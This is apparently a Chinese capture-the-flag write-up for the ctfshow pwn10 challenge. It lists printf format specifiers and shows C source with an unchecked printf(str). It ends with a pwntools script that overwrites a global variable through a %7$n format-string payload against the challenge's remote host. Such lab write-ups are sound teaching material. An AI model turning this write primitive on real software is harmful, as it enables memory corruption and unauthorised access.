ctfshow—pwn10
阅读原文时间:2023年07月08日阅读:1

格式化字符串漏洞

具体什么是格式化字符串请大家参考如下文章

https://wiki.x10sec.org/pwn/fmtstr/fmtstr_intro/

printf函数格式化输出符号及详细说明

原文地址:https://blog.csdn.net/xiexievv/article/details/6831194
%a  浮点数、十六进制数字和p-记数法(c99
%A  浮点数、十六进制数字和p-记法(c99)
%c  一个字符(char)
%C  一个ISO宽字符
%d  有符号十进制整数(int)(%ld、%Ld:长整型数据(long),%hd:输出短整形。) 
%e  浮点数、e-记数法
%E  浮点数、E-记数法
%f  单精度浮点数(默认float)、十进制记数法(%.nf  这里n表示精确到小数位后n位.十进制计数)
%g  根据数值不同自动选择%f或%e.
%G  根据数值不同自动选择%f或%e.
%i  有符号十进制数(与%d相同)
%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置
%o  无符号八进制整数
%p  指针
%s  对应字符串char*(%s = %hs = %hS 输出 窄字符)
%S  对应宽字符串WCAHR*(%ws = %S 输出宽字符串)
%u  无符号十进制整数(unsigned int)
%x  使用十六进制数字0xf的无符号十六进制整数 
%X  使用十六进制数字0xf的无符号十六进制整数
%%  打印一个百分号
%I64d 用于INT64 或者 long long
%I64u 用于UINT64 或者 unsigned long long
%I64x 用于64位16进制数据
%m.n : m指域宽,即对应的输出项在输出设备上所占的字符数。n指精度。用于说明输出的实型数的小数位数。为指定n时,隐含的精度为n=6位。
l 对整型指long型,对实型指double型。h用于将整型的格式字符修正为short型。

题目源码

#include <stdio.h>
int num = 0;
int main() {
    setvbuf(stdin, 0, 1, 0);
    setvbuf(stdout, 0, 2, 0);
    char str[100];
    printf("try pwn me?\n");
    scanf("%s", str);
    printf(str);
    if (num == 16)
    {
        system("cat flag");
    }
    else
    {
        printf("You may need to keep learning!");
    }
    return 0;
}

解题

分析

定义了一个全局变量num
str存在溢出
只有一个格式化字符串漏洞
利用漏洞更改num的数值
最终达到输出flag的目的

测试偏移量

可以得到偏移量为7

编写脚本

from pwn import *

p = remote('124.156.121.112',28053)
#p = process("./pwn10")
num_addr = 0x0804A030
payload = p32(num_addr)+"aaaaaaaaaaaa%7$n"
p.sendline(payload)
p.interactive()

测试

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章